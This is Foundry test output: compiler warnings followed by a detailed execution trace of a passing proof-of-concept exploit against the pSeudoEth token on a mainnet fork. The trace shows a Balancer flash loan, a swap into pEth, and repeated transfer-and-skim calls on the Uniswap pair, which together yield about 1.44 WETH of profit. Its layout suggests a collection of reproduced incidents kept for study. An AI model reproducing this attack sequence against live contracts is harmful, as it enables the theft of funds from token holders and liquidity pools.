Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-10/pSeudoEth_exp.sol:17:5:
   |
17 |     IWETH WETH = IWETH(payable(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-10/pSeudoEth_exp.sol:48:9:
   |
48 |         address[] memory tokens,
   |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-10/pSeudoEth_exp.sol:50:9:
   |
50 |         uint256[] memory feeAmounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-10/pSeudoEth_exp.sol:51:9:
   |
51 |         bytes memory userData
   |         ^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 486.31ms (4.01ms CPU time)

Ran 1 test for src/test/2023-10/pSeudoEth_exp.sol:ContractTest
[PASS] testExploit() (gas: 431509)
Logs:
  Before Start: 0 WETH
  Attack Exploit: 1.437545289007891970 WETH

Traces:
  [74086] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 18305131 [1.83e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "Balancer")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "Uniswap V2: Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], "Uniswap V2: pEth")
    │   └─ ← [Return]
    ├─ [24420] WETH::approve(Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    ├─ [25324] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::approve(Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [513309] ContractTest::testExploit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Before Start: %d WETH", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [487822] Balancer::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [51970861731879316502999 [5.197e22]], 0x)
    │   ├─ [2534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 51970861731879316502999 [5.197e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 51970861731879316502999 [5.197e22])
    │   │   ├─ emit Transfer(from: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 51970861731879316502999 [5.197e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000b0158975fb7b91239d7 → 0
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000b0158975fb7b91239d7
    │   │   └─ ← [Return] true
    │   ├─ [438513] ContractTest::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [51970861731879316502999 [5.197e22]], [0], 0x)
    │   │   ├─ [102051] Uniswap V2: Router::swapExactTokensForTokensSupportingFeeOnTransferTokens(51970861731879316502999 [5.197e22], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [10225] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 51970861731879316502999 [5.197e22])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 51970861731879316502999 [5.197e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000b0158975fb7b91239d7 → 0
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000000144236dd2b65e55d → 0x000000000000000000000000000000000000000000000b016cd99694e4781f34
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [7831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2504] Uniswap V2: pEth::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1537965509184617860 [1.537e18], 1459789552765232477 [1.459e18], 1687933859 [1.687e9]
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [66934] Uniswap V2: pEth::swap(1537922181095525778 [1.537e18], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [31246] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1537922181095525778 [1.537e18])
    │   │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1537922181095525778 [1.537e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000001557cc1350648d92
    │   │   │   │   │   │   @ 0x409f130c2d24c25c4bcadf8514a091a83625fb147a2fe4744d54b7a17f1c5cb3: 0x0000000000000000000000000000000000000000000000001557f37b6bc07d84 → 0x000000000000000000000000000000000000000000000000000027681b5beff2
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 43328089092082 [4.332e13]
    │   │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   │   ├─ emit Sync(reserve0: 43328089092082 [4.332e13], reserve1: 51972321521432081735476 [5.197e22])
    │   │   │   │   ├─ emit Swap(sender: Uniswap V2: Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 51970861731879316502999 [5.197e22], amount0Out: 1537922181095525778 [1.537e18], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x649bd3a3000000000000144236dd2b65e55d0000000000001557f37b6bc07d84 → 0x6522827f000000000b016cd99694e4781f34000000000000000027681b5beff2
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000001b9ed89341b9c22e750f27b0ed9fc00e98 → 0x000000000000000000000000000000a98425ea0c6995cdc5dcef8c6100734ba0
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000001527ba75e3e1acb7674562866df8f7c6d8 → 0x00000000000000000000000000000094fe0047b163e890ef9ec9a17fc7fe8540
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [1831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 1537922181095525778 [1.537e18]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [1831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1537922181095525778 [1.537e18]
    │   │   ├─ [4546] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 1537922181095525778 [1.537e18])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 1537922181095525778 [1.537e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000001557cc1350648d92 → 0
    │   │   │   │   @ 0x409f130c2d24c25c4bcadf8514a091a83625fb147a2fe4744d54b7a17f1c5cb3: 0x000000000000000000000000000000000000000000000000000027681b5beff2 → 0x0000000000000000000000000000000000000000000000001557f37b6bc07d84
    │   │   │   └─ ← [Return] true
    │   │   ├─ [65398] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [1831] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 1537965509184617860 [1.537e18]
    │   │   │   ├─ [52912] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 1537922181095525778 [1.537e18])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c29: 0 → 0x000000000000000000000000000000000000000000000000000000000117506b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0 → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [20991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [4589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 11537965509184617860 [1.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 11537922181095525778 [1.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x000000000000000000000000000000000000000000000001158e460913d00000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x000000000000000000000000000000000000000000000001158e460913d00000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 21537965509184617860 [2.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 21537922181095525778 [2.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000001158e460913d00000 → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000001158e460913d00000 → 0x000000000000000000000000000000000000000000000001a055690d9db80000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 31537965509184617860 [3.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 31537922181095525778 [3.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000001a055690d9db80000 → 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 41537965509184617860 [4.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 41537922181095525778 [4.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000 → 0x000000000000000000000000000000000000000000000002b5e3af16b1880000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x0000000000000000000000000000000000000000000000022b1c8c1227a00000 → 0x000000000000000000000000000000000000000000000002b5e3af16b1880000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51537965509184617860 [5.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 51537922181095525778 [5.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000002b5e3af16b1880000 → 0x00000000000000000000000000000000000000000000000340aad21b3b700000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x000000000000000000000000000000000000000000000002b5e3af16b1880000 → 0x00000000000000000000000000000000000000000000000340aad21b3b700000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 61537965509184617860 [6.153e19]
    │   │   │   ├─ [5747] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 61537922181095525778 [6.153e19])
    │   │   │   │   ├─  emit topic 0: 0x57e1b125fcc61a64af71b7ebc1a263c826a564f77e786c6993ed677863a0dd9c
    │   │   │   │   │        topic 1: 0x0000000000000000000000002033b54b6789a963a02bfcbd40a46816770f1161
    │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x00000000000000000000000000000000000000000000000340aad21b3b700000 → 0x000000000000000000000000000000000000000000000003cb71f51fc5580000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 51972321521432081735476 [5.197e22]
    │   │   │   ├─ [3262] WETH::transfer(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], to: Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x652578ed1ed2df8a912180ff02bd923c07024edb1ed4040173c1fea166324c28: 0x00000000000000000000000000000000000000000000000340aad21b3b700000 → 0x000000000000000000000000000000000000000000000003cb71f51fc5580000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [18991] Uniswap V2: pEth::skim(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161])
    │   │   │   ├─ [2589] 0x62aBdd605E710Cc80a52062a8cC7c5d659dDDbE7::balanceOf(Uniswap V2: pEth: [0x2033B54B6789a963A02BfCbd40A46816770f1161]) [staticcall]
    │   │   │   │   └─ ← [Return] 71537965509184617860 [7.153e19]
